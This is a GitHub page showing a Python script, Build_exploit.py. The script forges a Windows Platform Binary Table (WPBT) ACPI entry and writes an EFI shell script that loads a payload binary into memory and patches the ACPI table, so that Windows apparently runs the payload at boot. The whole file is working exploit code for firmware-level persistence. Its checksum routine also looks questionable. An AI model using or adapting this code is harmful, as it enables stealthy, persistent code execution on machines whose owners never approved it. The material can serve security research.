-
Notifications
You must be signed in to change notification settings - Fork 17
/
Copy pathBuild_exploit.py
46 lines (40 loc) · 2.04 KB
/
Build_exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
import binascii
import os
import struct
#Target address to place binary at , location must persist past ExitBootService
BINARY_LOCATION_ADDRESS=0x7BB76000
#Address of target ACPI table to replace
ACPI_TABLE_ADDRESS=0x7BBC4000
payload_filename = "native_test_c_temp.bin"
payload_file = open(payload_filename, "rb")
PAYLOAD_FILE_SIZE=os.path.getsize(payload_filename)
wpbt = bytearray(b'\x57\x50\x42\x54\x34\x00\x00\x00\x01\x00\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x01\x00\x00\x00\x41\x41\x41\x41\x00\x00\x04\x00')
wpbt.extend(struct.pack("<L", PAYLOAD_FILE_SIZE))
wpbt.extend(struct.pack("<Q", BINARY_LOCATION_ADDRESS))
wpbt.extend(bytearray(b'\x01\x01\x00\x00'))
#Calculate 2's compliment
_sum=0
for x in range(0,len(wpbt)):
filebits = int(''.join(format(wpbt[x], 'b') ))
bits = ~filebits
bits += 1
intbits=int(str(bits),2)
_sum=_sum+intbits
_2sComp = _sum%256
wpbt[9]=struct.pack("B", _2sComp)
#print ''.join('{:02x}'.format(x) for x in wpbt)
start = BINARY_LOCATION_ADDRESS
end = start + PAYLOAD_FILE_SIZE
payload_data = payload_file.read()
file = open('exploit.nsh', 'w')
file.write('echo -off\r\n')
for i in xrange(start, end,8 ):
file.write('mm 0x'+format(i, 'X')+' -w 8 0x'+binascii.hexlify(payload_data[i-start+7])+binascii.hexlify(payload_data[i-start+6])+binascii.hexlify(payload_data[i-start+5])+binascii.hexlify(payload_data[i-start+4])+binascii.hexlify(payload_data[i-start+3])+binascii.hexlify(payload_data[i-start+2])+binascii.hexlify(payload_data[i-start+1])+ binascii.hexlify(payload_data[i-start])+'\r\n')
file.write('echo Done uploading payload file to memory\r\n')
for i in xrange(ACPI_TABLE_ADDRESS, ACPI_TABLE_ADDRESS+len(wpbt),1 ):
file.write('mm 0x'+format(i, 'X')+' -w 1 '+hex(wpbt[i-ACPI_TABLE_ADDRESS])+'\r\n')
file.write('echo Done patching ACPI table\r\n')
file.write('echo -on\r\n')
#Example of a last line in the script to go ahead and start windows.
#file.write('fs1:\\EFI\\Microsoft\\Boot\\bootmgfw.efi\r\n')
file.close()